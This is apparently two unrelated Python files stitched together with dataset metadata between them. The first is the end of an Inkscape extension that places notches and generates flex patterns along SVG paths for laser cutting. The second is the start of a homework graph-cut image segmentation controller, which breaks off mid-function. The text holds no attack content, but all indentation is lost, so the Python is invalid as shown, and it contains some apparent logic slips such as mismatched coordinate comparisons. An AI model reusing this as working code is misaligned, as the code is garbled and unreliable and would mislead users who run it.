Slope = (y1 - y0) / (x1 - x0)
# The actual notch position will be on the line between last_index_in_p-1 and last_index_in_p and at a distance notch size of Ox,Oy
# The intersection of a line and a circle could be computed as a second degree equation
# The coefficients of this equation are computed below
a = 1.0 + Slope**2
b = 2*Slope*y0 - 2*Slope**2*x0 - 2*Ox - 2*Slope*Oy
c = Slope**2*x0**2 + y0**2 -2*Slope*x0*y0 + 2*Slope*x0*Oy - 2*y0*Oy + Ox**2 + Oy**2 - Distance_notch**2
solx1, solx2 = Solve2nd(a, b, c)
soly1 = y0 + Slope*(solx1-x0)
soly2 = y0 + Slope*(solx2-x0)
# Now keep the point which is between (x0,y0) and (x1, y1)
# The distance between (x1,y1) and the "good" solution will be lower than the distance between (x0,y0) and (x1,y1)
distance1 = distance2points(x1, y1, solx1, soly1)
distance2 = distance2points(x1, y1, solx2, soly2)
if distance1 < distance2:
#Keep solx1
solx = solx1
soly = soly1
else:
#Keep solx2
solx = solx2
soly = soly2
notch_points.append((solx, soly, last_index_in_p-1))
if abs(distance2points(solx, soly, Ox, Oy) - Distance_notch) > 1:
#Problem
self.DebugMsg("Problem in compute_next_notch: x0,y0 ="+str((x0,y0))+" x1,y1="+str((x1,y1))+'\n')
self.DebugMsg("Len(p)="+str(len(p))+'\n')
self.DebugMsg("Slope="+str(Slope)+'\n')
self.DebugMsg("solx1="+str(solx1)+" soly1="+str(soly1)+" soly1="+str(solx2)+" soly1="+str(soly2)+'\n')
self.DebugMsg(str(index_notch)+": Adding new point ("+str(solx)+","+ str(soly) + "), distance is "+ str(distance2points(solx, soly, Ox, Oy))+ " New index in path :"+str(last_index_in_p)+'\n')
#self.DebugMsg(str(index_notch)+": Adding new point ("+str(solx)+","+ str(soly) + "), distance is "+ str(distance2points(solx, soly, Ox, Oy))+ " New index in path :"+str(last_index_in_p)+'\n')
return last_index_in_p
def DrawPoly(self, p, parent):
group = etree.SubElement(parent, 'g')
Newpath = inkcape_draw_cartesian((self.xmin - self.xmax - 10, 0), group)
self.DebugMsg('DrawPoly First element (0) : '+str(p[0])+ ' Call MoveTo('+ str(p[0][0])+','+str(p[0][1])+'\n')
Newpath.MoveTo(p[0][0], p[0][1])
n = len(p)
index = 1
for point in p[1:n]:
Newpath.LineTo(point[0], point[1])
index += 1
Newpath.GenPath()
def Simplify(self, poly, max_error):
'''
Simplify the polygon, remove vertices which are aligned or too close from others
The parameter give the max error, below this threshold, points will be removed
return the simplified polygon, which is modified in place
'''
#First point
LastIdx = 0
limit = max_error * max_error #Square because distance will be square !
i = 1
while i < len(poly)-1:
#Build segment between Vertex[i-1] and Vertex[i+1]
Seg = Segment(poly[LastIdx], poly[i+1])
#self.DebugMsg("Pt["+str(i)+"]/"+str(len(poly))+" ="+str(poly[i])+" Segment="+str(Seg)+"\n")
# Compute square of distance between Vertex[i] and Segment
dis_square = Seg.square_line_distance(poly[i])
if dis_square < max_error:
# Too close, remove this point
poly.pop(i) #and do NOT increment index
#self.DebugMsg("Simplify, removing pt "+str(i)+"="+str(poly[i])+" in Segment : "+str(Seg)+" now "+str(len(poly))+" vertices\n")
else:
LastIdx = i
i += 1 #Increment index
# No need to process last point, it should NOT be modified and stay equal to first one
return poly
def MakePolyCCW(self, p):
'''
Take for polygon as input and make it counter clockwise.
If already CCW, just return the polygon, if not reverse it
To determine if polygon is CCW, compute area. If > 0 the polygon is CCW
'''
area = 0
for i in range(len(p)-1):
area += p[i][0]*p[i+1][1] - p[i+1][0]*p[i][1]
self.DebugMsg("poly area = "+str(area/2)+"\n")
if area < 0:
# Polygon is cloackwise, reverse
p.reverse()
self.DebugMsg("Polygon was clockwise, reverse it\n")
return p
def ComputeAngles(self, p):
'''
Compute a list with angles of all edges of the polygon
Return this list
'''
angles = []
for i in range(len(p)-1):
a = math.atan2(p[i+1][1] - p[i][1], p[i+1][0] - p[i][0])
angles.append(a)
# Last value is not defined as Pt n-1 = Pt 0, set it to angle[0]
angles.append(angles[0])
return angles
def writeModifiedPath(self, node, parent):
'''
Take the paths (polygons) computed from previous step and generate
1) The input path with notches
2) The flex structure associated with the path with notches (same length and number of notches)
'''
path = self.paths[node]
if (path is None) or (len(path) == 0):
return
self.DebugMsg('Enter writeModifiedPath, node='+str(node)+' '+str(len(path))+' paths, global Offset'+str((self.xmin - self.xmax - 10, 0))+'\n')
# First, if there are several paths, checks if one path is included in the first one.
# If not exchange such as the first one is the bigger one.
# All paths which are not the first one will have notches reverted to be outside the polygon instead of inside the polygon.
# On the finbal paths, these notches will always be inside the form.
if len(path) > 1:
OrderPathModified = True
# Arrange paths such as greater one is first, all others
while OrderPathModified:
OrderPathModified = False
for i in range(1, len(path)):
if polyInPoly(path[i], None, path[0], None):
self.DebugMsg("Path "+str(i)+" is included in path 0\n")
elif polyInPoly(path[0], None, path[i], None):
self.DebugMsg("Path "+str(i)+" contains path 0, exchange\n")
path[0], path[i] = path[i], path[0]
OrderPathModified = True
index_path = 0
xFlexOffset = self.xmin - 2*self.xmax - 20
yFlexOffset = self.height - self.ymax - 10
for p in path:
self.DebugMsg('Processing Path, '+str(index_path)+" Len(path)="+str(len(p))+'\n')
self.DebugMsg('p='+str(p)+'\n')
reverse_notch = False
if index_path > 0 and polyInPoly(p, None, path[0], None):
reverse_notch = True # For included path, reverse notches
#Simplify path, remove unnecessary vertices
p = self.Simplify(p, 0.1)
self.DebugMsg("---After simplification, path has "+str(len(p))+" vertices\n")
#Ensure that polygon is counter clockwise
p = self.MakePolyCCW(p)
self.DrawPoly(p, parent)
#Now compute path length. Path length is the sum of length of edges
length_path = 0
n = len(p)
index = 1
while index < n:
length_path += math.hypot((p[index][0] - p[index-1][0]), (p[index][1] - p[index-1][1]))
index += 1
angles = self.ComputeAngles(p)
# compute the sum of angles difference and check that it is 2*pi
SumAngle = 0.0
for i in range(len(p)-1):
Delta_angle = angles[i+1] - angles[i]
if Delta_angle > math.pi:
Delta_angle -= 2*math.pi
elif Delta_angle < -math.pi:
Delta_angle += 2*math.pi
Delta_angle = abs(Delta_angle)
self.DebugMsg("idx="+str(i)+" Angle1 ="+str(round(angles[i]*180/math.pi,3))+" Angle 2="+str(round(angles[i+1]*180/math.pi,3))+" Delta angle="+str(round(Delta_angle*180/math.pi, 3))+"°\n")
SumAngle += Delta_angle
self.DebugMsg("Sum of angles="+str(SumAngle*180/math.pi)+"°\n")
# Flex length will be path length - thickness*SumAngle/2 to keep flex aligned on the shortest path
flex_length = length_path - self.thickness*SumAngle/2
self.DebugMsg('Path length ='+str(length_path)+" Flex length ="+str(flex_length)+" Difference="+str(length_path-flex_length)+'\n')
#Default notch size is notchesInterval + 2mm
#Actual notch size will be adjusted to match the length
notch_number = int(round(flex_length / (self.notchesInterval + 2), 0))
notch_size = flex_length / notch_number
self.DebugMsg('Number of notches ='+str(notch_number)+' ideal notch size =' + str(round(notch_size,3)) +'\n')
# Compute position of the points on the path that will become notches
# Starting at 0, each point will be at distance actual_notch_size from the previous one, at least on one side of the notch (the one with the smallest distance)
# On the path (middle line) the actual distance will be notch_size + thickness*delta_angle/2 where delta angle is the difference between the angle at starting point and end point
# As notches are not aligned to vertices, the actual length of the path will be different from the computed one (lower in fact)
# To avoid a last notch too small, we will repeat the process until the size of the last notch is OK (less than .1mm error)
# Use an algorithm which corrects the notch_size by computing previous length of the last notch
nb_try = 0
size_last_notch = 0
oldSize = 0
BestDifference = 9999999
BestNotchSize = notch_size
mode_linear = False
delta_notch = -0.01 #In most cases, should reduce notch size
while nb_try < 100:
notch_points = [ (p[0][0], p[0][1], 0) ] # Build a list of tuples with corrdinates (x,y) and offset within polygon which is 0 the the starting point
index = 1 # Notch index
last_index_in_p = 1 # Start at 1, index 0 is the current one
self.DebugMsg("Pass "+str(nb_try)+" First point ("+str(p[0][0])+","+ str(p[0][1]) + ' notch_size='+str(notch_size)+'\n')
while index < notch_number:
#Compute next notch point and append it to the list
last_index_in_p = self.compute_next_notch(notch_points, p, angles, last_index_in_p, notch_size)
#before, after = self.DistanceOnPath(p, notch_points[index], last_index_in_p-1)
#self.DebugMsg(" Notch "+str(index)+" placed in "+str(notch_points[index])+" distance before ="+str(before)+" after="+str(after)+" total="+str(before+after)+'\n')
index += 1
size_last_notch = distance2points(p[n-1][0], p[n-1][1], notch_points[index-1][0], notch_points[index-1][1])
self.DebugMsg("Last notch size :"+str(size_last_notch)+'\n')
if abs(notch_size - size_last_notch) < BestDifference:
BestNotchSize = notch_size
BestDifference = abs(notch_size - size_last_notch)
if abs(notch_size - size_last_notch) <= 0.1:
break
# Change size_notch, cut small part in each notch
# The 0.5 factor is used to avoid non convergent series (too short then too long...)
if mode_linear:
if notch_size > size_last_notch and delta_notch > 0:
delta_notch -= delta_notch*0.99
elif notch_size < size_last_notch and delta_notch < 0:
delta_notch -= delta_notch*0.99
notch_size += delta_notch
self.DebugMsg("Linear mode, changing delta_notch size :"+str(delta_notch)+" --> notch_size="+str(notch_size)+'\n')
else:
if notch_size > size_last_notch and delta_notch > 0:
delta_notch = -0.5*delta_notch
self.DebugMsg("Changing delta_notch size :"+str(delta_notch)+'\n')
elif notch_size < size_last_notch and delta_notch < 0:
delta_notch = -0.5*delta_notch
self.DebugMsg("Changing delta_notch size :"+str(delta_notch)+'\n')
notch_size += delta_notch
if abs(delta_notch) < 0.002:
mode_linear = True
# Change size_notch, cut small part in each notch
oldSize = notch_size
# The 0.5 factor is used to avoid non convergent series (too short then too long...)
notch_size -= 0.5*(notch_size - size_last_notch)/notch_number
nb_try += 1
if nb_try >= 100:
self.DebugMsg("Algorithm doesn't converge, use best results :"+str(BestNotchSize)+" which gave last notch size difference "+str(BestDifference)+'\n')
notch_size = BestNotchSize
# Now draw the actual notches
group = etree.SubElement(parent, 'g')
# First draw a start line which will help to position flex.
Startpath = inkcape_draw_cartesian(((self.xmin - self.xmax - 10), 0), group)
index_in_p = notch_points[0][2]
AngleSlope = math.atan2(p[index_in_p+1][1] - p[index_in_p][1], p[index_in_p+1][0] - p[index_in_p][0])
#Now compute both ends of the notch,
AngleOrtho = AngleSlope + math.pi/2
Line_Start = (notch_points[0][0] + self.thickness/2*math.cos(AngleOrtho), notch_points[0][1] + self.thickness/2*math.sin(AngleOrtho))
Line_End = (notch_points[0][0] - self.thickness/2*math.cos(AngleOrtho), notch_points[0][1] - self.thickness/2*math.sin(AngleOrtho))
self.DebugMsg("Start line Start"+str(Line_Start)+" End("+str(Line_End)+" Start inside "+str(pointInPoly(Line_Start, p))+ " End inside :"+str(pointInPoly(Line_End, p))+'\n')
#Notch End should be inside the path and Notch Start outside... If not reverse
if pointInPoly(Line_Start, p):
Line_Start, Line_End = Line_End, Line_Start
AngleOrtho += math.pi
elif not pointInPoly(Line_End, p):
#Specific case, neither one is in Polygon (Open path ?), take the lowest Y as Line_End
if Line_End[1] > Line_Start[0]:
Line_Start, Line_End = Line_End, Line_Start
AngleOrtho += math.pi
#Now compute a new Start, inside the polygon Start = 3*End - 2*Start
newLine_Start = (3*Line_End[0] - 2*Line_Start[0], 3*Line_End[1] - 2*Line_Start[1])
Startpath.MoveTo(newLine_Start[0], newLine_Start[1])
Startpath.LineTo(Line_End[0], Line_End[1])
self.DebugMsg("Draw StartLine start from "+str((newLine_Start[0], newLine_Start[1]))+" to "+str((Line_End[0], Line_End[1]))+'\n')
Startpath.GenPathStart()
#Then draw the notches
Newpath = inkcape_draw_cartesian(((self.xmin - self.xmax - 10), 0), group)
self.DebugMsg("Generate path with "+str(notch_number)+" notches, offset ="+str(((self.xmin - self.xmax - 10), 0))+'\n')
isClosed = distance2points(p[n-1][0], p[n-1][1], p[0][0], p[0][1]) < 0.1
# Each notch is a tuple with (X, Y, index_in_p). index_in_p will be used to compute slope of line of the notch
# The notch will be thickness long, and there will be a part 'inside' the path and a part 'outside' the path
# The longest part will be outside
index = 0
NX0 = 0
NX1 = 0
NX2 = 0
NX3 = 0
NY0 = 0
NY1 = 0
NY2 = 0
NY3 = 0
N_Angle = 0
Notch_Pos = []
while index < notch_number:
# Line slope of the path at notch point is
index_in_p = notch_points[index][2]
N_Angle = angles[index_in_p]
AngleSlope = math.atan2(p[index_in_p+1][1] - p[index_in_p][1], p[index_in_p+1][0] - p[index_in_p][0])
self.DebugMsg("Draw notch "+str(index)+" Slope is "+str(AngleSlope*180/math.pi)+'\n')
self.DebugMsg("Ref="+str(notch_points[index])+'\n')
self.DebugMsg("Path points:"+str((p[index_in_p][0], p[index_in_p][1]))+', '+ str((p[index_in_p+1][0], p[index_in_p+1][1]))+'\n')
#Now compute both ends of the notch,
AngleOrtho = AngleSlope + math.pi/2
Notch_Start = (notch_points[index][0] + self.thickness/2*math.cos(AngleOrtho), notch_points[index][1] + self.thickness/2*math.sin(AngleOrtho))
Notch_End = (notch_points[index][0] - self.thickness/2*math.cos(AngleOrtho), notch_points[index][1] - self.thickness/2*math.sin(AngleOrtho))
self.DebugMsg("Notch "+str(index)+": Start"+str(Notch_Start)+" End("+str(Notch_End)+" Start inside "+str(pointInPoly(Notch_Start, p))+ " End inside :"+str(pointInPoly(Notch_End, p))+'\n')
#Notch End should be inside the path and Notch Start outside... If not reverse
if pointInPoly(Notch_Start, p):
Notch_Start, Notch_End = Notch_End, Notch_Start
AngleOrtho += math.pi
elif not pointInPoly(Notch_End, p):
#Specific case, neither one is in Polygon (Open path ?), take the lowest Y as Notch_End
if Notch_End[1] > Notch_Start[0]:
Notch_Start, Notch_End = Notch_End, Notch_Start
AngleOrtho += math.pi
#if should reverse notches, do it now
if reverse_notch:
Notch_Start, Notch_End = Notch_End, Notch_Start
AngleOrtho += math.pi
if AngleOrtho > 2*math.pi:
AngleOrtho -= 2*math.pi
ln = 2.0
if index == 0:
Newpath.MoveTo(Notch_Start[0], Notch_Start[1])
first = (Notch_Start[0], Notch_Start[1])
if not isClosed:
ln = 1.0 # Actual, different Notch size for the first one when open path
else:
Newpath.LineTo(Notch_Start[0], Notch_Start[1])
if not isClosed and index == notch_number - 1:
ln = 1.0
self.DebugMsg("LineTo starting point from :"+str((x,y))+" to "+str((Notch_Start[0], Notch_Start[1]))+" Length ="+str(distance2points(x, y, Notch_Start[0], Notch_Start[1]))+'\n')
Newpath.LineTo(Notch_End[0], Notch_End[1])
NX0 = Notch_Start[0]
NY0 = Notch_Start[1]
NX1 = Notch_End[0]
NY1 = Notch_End[1]
self.DebugMsg("Draw notch_1 start from "+str((Notch_Start[0], Notch_Start[1]))+" to "+str((Notch_End[0], Notch_End[1]))+'Center is '+str(((Notch_Start[0]+Notch_End[0])/2, (Notch_Start[1]+Notch_End[1])/2))+'\n')
#Now draw a line parallel to the path, which is notch_size*(2/(notchesInterval+2)) long. Internal part of the notch
x = Notch_End[0] + (notch_size*ln)/(self.notchesInterval+ln)*math.cos(AngleSlope)
y = Notch_End[1] + (notch_size*ln)/(self.notchesInterval+ln)*math.sin(AngleSlope)
Newpath.LineTo(x, y)
NX2 = x
NY2 = y
self.DebugMsg("Draw notch_2 to "+str((x, y))+'\n')
#Then a line orthogonal, which is thickness long, reverse from first one
x = x + self.thickness*math.cos(AngleOrtho)
y = y + self.thickness*math.sin(AngleOrtho)
Newpath.LineTo(x, y)
NX3 = x
NY3 = y
self.DebugMsg("Draw notch_3 to "+str((x, y))+'\n')
Notch_Pos.append((NX0, NY0, NX1, NY1, NX2, NY2, NX3, NY3, N_Angle))
# No need to draw the last segment, it will be drawn when starting the next notch
index += 1
#And the last one if the path is closed
if isClosed:
self.DebugMsg("Path is closed, draw line to start point "+str((p[0][0], p[0][1]))+'\n')
Newpath.LineTo(first[0], first[1])
else:
self.DebugMsg("Path is open\n")
Newpath.GenPath()
# Analyze notches for debugging purpose
for i in range(len(Notch_Pos)):
self.DebugMsg("Notch "+str(i)+" Pos="+str(Notch_Pos[i])+" Angle="+str(round(Notch_Pos[i][8]*180/math.pi))+"\n")
if (i > 0):
self.DebugMsg(" FromLast Notch N3-N0="+str(distance2points(Notch_Pos[i-1][6], Notch_Pos[i-1][7], Notch_Pos[i][0], Notch_Pos[i][1]))+"\n")
self.DebugMsg(" Distances: N0-N3="+str(distance2points(Notch_Pos[i][0], Notch_Pos[i][1], Notch_Pos[i][6], Notch_Pos[i][7]))+" N1-N2="+str(distance2points(Notch_Pos[i][2], Notch_Pos[i][3], Notch_Pos[i][4], Notch_Pos[i][5]))+"\n")
# For each notch determine if we need flex or not. Flex is only needed if there is some curves
# So if notch[i]-1 notch[i] notch[i+1] are aligned, no need to generate flex in i-1 and i
for index in range(notch_number):
self.flexnotch.append(1) # By default all notches need flex
index = 1
while index < notch_number-1:
det = (notch_points[index+1][0]- notch_points[index-1][0])*(notch_points[index][1] - notch_points[index-1][1]) - (notch_points[index+1][1] - notch_points[index-1][1])*(notch_points[index][0] - notch_points[index-1][0])
self.DebugMsg("Notch "+str(index)+": det="+str(det))
if abs(det) < 0.1: # My threhold to be adjusted
self.flexnotch[index-1] = 0 # No need for flex for this one and the following
self.flexnotch[index] = 0
self.DebugMsg(" no flex in notch "+str(index-1)+" and "+str(index))
index += 1
self.DebugMsg("\n")
# For the last one try notch_number - 2, notch_number - 1 and 0
det = (notch_points[0][0]- notch_points[notch_number - 2][0])*(notch_points[notch_number - 1][1] - notch_points[notch_number - 2][1]) - (notch_points[0][1] - notch_points[notch_number - 2][1])*(notch_points[notch_number - 1][0] - notch_points[notch_number - 2][0])
if abs(det) < 0.1: # My threhold to be adjusted
self.flexnotch[notch_number-2] = 0 # No need for flex for this one and the following
self.flexnotch[notch_number-1] = 0
# and the first one with notch_number - 1, 0 and 1
det = (notch_points[1][0]- notch_points[notch_number-1][0])*(notch_points[0][1] - notch_points[notch_number-1][1]) - (notch_points[1][1] - notch_points[notch_number-1][1])*(notch_points[0][0] - notch_points[notch_number-1][0])
if abs(det) < 0.1: # My threhold to be adjusted
self.flexnotch[notch_number-1] = 0 # No need for flex for this one and the following
self.flexnotch[0] = 0
self.DebugMsg("FlexNotch ="+str(self.flexnotch)+"\n")
# Generate Associated flex
self.GenFlex(parent, notch_number, notch_size, xFlexOffset, yFlexOffset)
yFlexOffset -= self.height + 10
index_path += 1
def recursivelyTraverseSvg(self, aNodeList):
'''
[ This too is largely lifted from eggbot.py and path2openscad.py ]
Recursively walk the SVG document, building polygon vertex lists
for each graphical element we support.
Rendered SVG elements:
<circle>, <ellipse>, <line>, <path>, <polygon>, <polyline>, <rect>
Except for path, all elements are first converted into a path the processed
Supported SVG elements:
<group>
Ignored SVG elements:
<defs>, <eggbot>, <metadata>, <namedview>, <pattern>,
processing directives
All other SVG elements trigger an error (including <text>)
'''
for node in aNodeList:
self.DebugMsg("Node type :" + node.tag + '\n')
if node.tag == inkex.addNS('g', 'svg') or node.tag == 'g':
self.DebugMsg("Group detected, recursive call\n")
self.recursivelyTraverseSvg(node)
elif node.tag == inkex.addNS('path', 'svg'):
self.DebugMsg("Path detected, ")
path_data = node.get('d')
if path_data:
self.getPathVertices(path_data, node)
else:
self.DebugMsg("NO path data present\n")
elif node.tag == inkex.addNS('rect', 'svg') or node.tag == 'rect':
# Create a path with the outline of the rectangle
x = float(node.get('x'))
y = float(node.get('y'))
if (not x) or (not y):
pass
w = float(node.get('width', '0'))
h = float(node.get('height', '0'))
self.DebugMsg('Rectangle X='+ str(x)+',Y='+str(y)+', W='+str(w)+' H='+str(h)+'\n')
a = []
a.append(['M', [x, y]])
a.append(['l', [w, 0]])
a.append(['l', [0, h]])
a.append(['l', [-w, 0]])
a.append(['Z', []])
self.getPathVertices(str(Path(a)), node)
elif node.tag == inkex.addNS('line', 'svg') or node.tag == 'line':
# Convert
#
# <line x1="X1" y1="Y1" x2="X2" y2="Y2/>
#
# to
#
# <path d="MX1,Y1 LX2,Y2"/>
x1 = float(node.get('x1'))
y1 = float(node.get('y1'))
x2 = float(node.get('x2'))
y2 = float(node.get('y2'))
self.DebugMsg('Line X1='+ str(x1)+',Y1='+str(y1)+', X2='+str(x2)+' Y2='+str(y2)+'\n')
if (not x1) or (not y1) or (not x2) or (not y2):
pass
a = []
a.append(['M', [x1, y1]])
a.append(['L', [x2, y2]])
self.getPathVertices(str(Path(a)), node)
elif node.tag == inkex.addNS('polyline', 'svg') or node.tag == 'polyline':
# Convert
#
# <polyline points="x1,y1 x2,y2 x3,y3 [...]"/>
#
# to
#
# <path d="Mx1,y1 Lx2,y2 Lx3,y3 [...]"/>
#
# Note: we ignore polylines with no points
pl = node.get('points', '').strip()
if pl == '':
pass
pa = pl.split()
d = "".join(["M " + pa[i] if i == 0 else " L " + pa[i] for i in range(0, len(pa))])
self.DebugMsg('PolyLine :'+ d +'\n')
self.getPathVertices(d, node)
elif node.tag == inkex.addNS('polygon', 'svg') or node.tag == 'polygon':
# Convert
#
# <polygon points="x1,y1 x2,y2 x3,y3 [...]"/>
#
# to
#
# <path d="Mx1,y1 Lx2,y2 Lx3,y3 [...] Z"/>
#
# Note: we ignore polygons with no points
pl = node.get('points', '').strip()
if pl == '':
pass
pa = pl.split()
d = "".join(["M " + pa[i] if i == 0 else " L " + pa[i] for i in range(0, len(pa))])
d += " Z"
self.DebugMsg('Polygon :'+ d +'\n')
self.getPathVertices(d, node)
elif node.tag == inkex.addNS('ellipse', 'svg') or \
node.tag == 'ellipse' or \
node.tag == inkex.addNS('circle', 'svg') or \
node.tag == 'circle':
# Convert circles and ellipses to a path with two 180 degree arcs.
# In general (an ellipse), we convert
#
# <ellipse rx="RX" ry="RY" cx="X" cy="Y"/>
#
# to
#
# <path d="MX1,CY A RX,RY 0 1 0 X2,CY A RX,RY 0 1 0 X1,CY"/>
#
# where
#
# X1 = CX - RX
# X2 = CX + RX
#
# Note: ellipses or circles with a radius attribute of value 0 are ignored
if node.tag == inkex.addNS('ellipse', 'svg') or node.tag == 'ellipse':
rx = float(node.get('rx', '0'))
ry = float(node.get('ry', '0'))
else:
rx = float(node.get('r', '0'))
ry = rx
if rx == 0 or ry == 0:
pass
cx = float(node.get('cx', '0'))
cy = float(node.get('cy', '0'))
x1 = cx - rx
x2 = cx + rx
d = 'M %f,%f ' % (x1, cy) + \
'A %f,%f ' % (rx, ry) + \
'0 1 0 %f,%f ' % (x2, cy) + \
'A %f,%f ' % (rx, ry) + \
'0 1 0 %f,%f' % (x1, cy)
self.DebugMsg('Arc :'+ d +'\n')
self.getPathVertices(d, node)
elif node.tag == inkex.addNS('pattern', 'svg') or node.tag == 'pattern':
pass
elif node.tag == inkex.addNS('metadata', 'svg') or node.tag == 'metadata':
pass
elif node.tag == inkex.addNS('defs', 'svg') or node.tag == 'defs':
pass
elif node.tag == inkex.addNS('desc', 'svg') or node.tag == 'desc':
pass
elif node.tag == inkex.addNS('namedview', 'sodipodi') or node.tag == 'namedview':
pass
elif node.tag == inkex.addNS('eggbot', 'svg') or node.tag == 'eggbot':
pass
elif node.tag == inkex.addNS('text', 'svg') or node.tag == 'text':
inkex.errormsg('Warning: unable to draw text, please convert it to a path first.')
pass
elif node.tag == inkex.addNS('title', 'svg') or node.tag == 'title':
pass
elif node.tag == inkex.addNS('image', 'svg') or node.tag == 'image':
if not self.warnings.has_key('image'):
inkex.errormsg(gettext.gettext('Warning: unable to draw bitmap images; ' +
'please convert them to line art first. Consider using the "Trace bitmap..." ' +
'tool of the "Path" menu. Mac users please note that some X11 settings may ' +
'cause cut-and-paste operations to paste in bitmap copies.'))
self.warnings['image'] = 1
pass
elif node.tag == inkex.addNS('pattern', 'svg') or node.tag == 'pattern':
pass
elif node.tag == inkex.addNS('radialGradient', 'svg') or node.tag == 'radialGradient':
# Similar to pattern
pass
elif node.tag == inkex.addNS('linearGradient', 'svg') or node.tag == 'linearGradient':
# Similar in pattern
pass
elif node.tag == inkex.addNS('style', 'svg') or node.tag == 'style':
# This is a reference to an external style sheet and not the value
# of a style attribute to be inherited by child elements
pass
elif node.tag == inkex.addNS('cursor', 'svg') or node.tag == 'cursor':
pass
elif node.tag == inkex.addNS('color-profile', 'svg') or node.tag == 'color-profile':
# Gamma curves, color temp, etc. are not relevant to single color output
pass
elif not isinstance(node.tag, basestring):
# This is likely an XML processing instruction such as an XML
# comment. lxml uses a function reference for such node tags
# and as such the node tag is likely not a printable string.
# Further, converting it to a printable string likely won't
# be very useful.
pass
else:
inkex.errormsg('Warning: unable to draw object <%s>, please convert it to a path first.' % node.tag)
pass
def effect(self):
# convert units
unit = self.options.unit
self.thickness = self.svg.unittouu(str(self.options.thickness) + unit)
self.height = self.svg.unittouu(str(self.options.zc) + unit)
self.max_flex_size = self.svg.unittouu(str(self.options.max_size_flex) + unit)
self.notchesInterval = int(self.options.notch_interval)
svg = self.document.getroot()
docWidth = self.svg.unittouu(svg.get('width'))
docHeigh = self.svg.unittouu(svg.attrib['height'])
# Open Debug file if requested
if self.options.Mode_Debug:
try:
self.fDebug = open('DebugPath2Flex.txt', 'w')
except IOError:
print ('cannot open debug output file')
self.DebugMsg("Start processing\n")
# First traverse the document (or selected items), reducing
# everything to line segments. If working on a selection,
# then determine the selection's bounding box in the process.
# (Actually, we just need to know it's extrema on the x-axis.)
# Traverse the selected objects
for id in self.options.ids:
self.recursivelyTraverseSvg([self.svg.selected[id]])
# Determine the center of the drawing's bounding box
self.cx = self.xmin + (self.xmax - self.xmin) / 2.0
self.cy = self.ymin + (self.ymax - self.ymin) / 2.0
layer = etree.SubElement(svg, 'g')
layer.set(inkex.addNS('label', 'inkscape'), 'Flex_Path')
layer.set(inkex.addNS('groupmode', 'inkscape'), 'layer')
# For each path, build a polygon with notches and the corresponding flex.
for key in self.paths:
self.writeModifiedPath(key, layer)
if self.fDebug:
self.fDebug.close()
if __name__ == '__main__':
Path2Flex().run() | 2.984375 | 3 |
HW4/submission/PART II/code/graph_cut_controller.py | ardaduz/math-cgv | 0 | 12767353 | import numpy as np
import scipy.ndimage as ndimage
import matplotlib.pyplot as plt
from skimage import data, color, img_as_float
from tkinter import *
from PIL import Image
from graph_cut import GraphCut
from graph_cut_gui import GraphCutGui
class GraphCutController:
def __init__(self):
self.__init_view()
def __init_view(self):
root = Tk()
root.geometry("700x500")
self._view = GraphCutGui(self, root)
root.mainloop()
# TODO: TASK 2.1
def __get_color_histogram(self, image, seed, hist_res):
"""
Compute a color histograms based on selected points from an image
:param image: color image
:param seed: Nx2 matrix containing the the position of pixels which will be used to compute the color histogram
:param histRes: resolution of the histogram
:return hist: color histogram
"""
seed_r_values = image[seed[:, 1], seed[:, 0], 0]
seed_g_values = image[seed[:, 1], seed[:, 0], 1]
seed_b_values = image[seed[:, 1], seed[:, 0], 2]
data = np.transpose(np.vstack((seed_r_values, seed_g_values, seed_b_values)))
histogram, _ = np.histogramdd(data, hist_res, range=[(0, 255), (0, 255), (0, 255)])
# w = 2*int(truncate*sigma + 0.5) + 1
# sigma = 0.65 is taken from MATLAB default, truncate = 4 in scipy default which results in w = 7
smoothed_histogram = ndimage.gaussian_filter(histogram, 0.85)
normalized_smoothed_histogram = smoothed_histogram / np.sum(smoothed_histogram.ravel())
return normalized_smoothed_histogram
# TODO: TASK 2.2
# Hint: Set K very high using numpy's inf parameter
def __get_unaries(self, image, lambda_param, hist_fg, hist_bg, seed_fg, seed_bg):
"""
:param image: color image as a numpy array
:param lambda_param: lamdba as set by the user
:param hist_fg: foreground color histogram
:param hist_bg: background color histogram
:param seed_fg: pixels marked as foreground by the user
:param seed_bg: pixels marked as background by the user
:return: unaries : Nx2 numpy array containing the unary cost for every pixels in I (N = number of pixels in I)
"""
print("Calcuating unaries...")
hist_step = 255.0 / 32.0
image_rows = np.size(image, 0)
image_cols = np.size(image, 1)
unaries = np.empty((image_rows, image_cols, 2))
for i in range(0, image_rows):
for j in range(0, image_cols):
pixel = image[i, j, :]
pixel_bins = np.floor(pixel / hist_step).astype(int)
pixel_bins[pixel_bins == 32] = 31
cost_fg = -np.log(hist_fg[pixel_bins[0], pixel_bins[1], pixel_bins[2]] + 1e-10)
cost_bg = -np.log(hist_bg[pixel_bins[0], pixel_bins[1], pixel_bins[2]] + 1e-10)
unaries[i, j, 1] = lambda_param * cost_bg
unaries[i, j, 0] = lambda_param * cost_fg
for j, i in seed_fg:
unaries[i, j, 1] = np.inf
unaries[i, j, 0] = 0
for j, i in seed_bg:
unaries[i, j, 1] = 0
unaries[i, j, 0] = np.inf
unariesN = np.reshape(unaries, (-1, 2))
return unariesN
# TASK 2.3
def __get_pairwise(self, image, sigma):
"""
Get pairwise terms for each pairs of pixels on image
:param image: color image as a numpy array
:param sigma: ad-hoc cost function parameter
:return: pairwise : ivj (triplet or coo) formatted list of lists containing the pairwise costs for image
"""
def get_neighbours(i, j, image_rows, image_cols):
neighbours = np.array([[i - 1, j - 1], # upper left
[i - 1, j], # upper
[i - 1, j + 1], # upper right
[i, j + 1], # right
[i + 1, j + 1], # lower right
[i + 1, j], # lower
[i + 1, j - 1], # lower left
[i, j - 1]]) # left
is_boundary_1 = 0 <= neighbours[:, 0]
is_boundary_2 = image_rows > neighbours[:, 0]
is_boundary_3 = 0 <= neighbours[:, 1]
is_boundary_4 = image_cols > neighbours[:, 1]
valid = np.logical_and(np.logical_and(is_boundary_1, is_boundary_2), np.logical_and(is_boundary_3, is_boundary_4))
return neighbours[valid, :]
print("Calcuating pairwises...")
image_rows = np.size(image, 0)
image_cols = np.size(image, 1)
pairwise = []
for i in range(0, image_rows):
for j in range(0, image_cols):
current_coordinates = np.array([i, j])
current_index = i * image_cols + j
current_pixel = image[i, j].astype(float)
neighbour_coordinates = get_neighbours(i, j, image_rows, image_cols)
neighbour_indices = neighbour_coordinates[:, 0] * image_cols + neighbour_coordinates[:, 1]
neighbour_pixels = image[neighbour_coordinates[:, 0], neighbour_coordinates[:, 1]].astype(float)
pixel_differences = np.subtract(neighbour_pixels, current_pixel)
pixel_distances = np.linalg.norm(pixel_differences, axis=1)
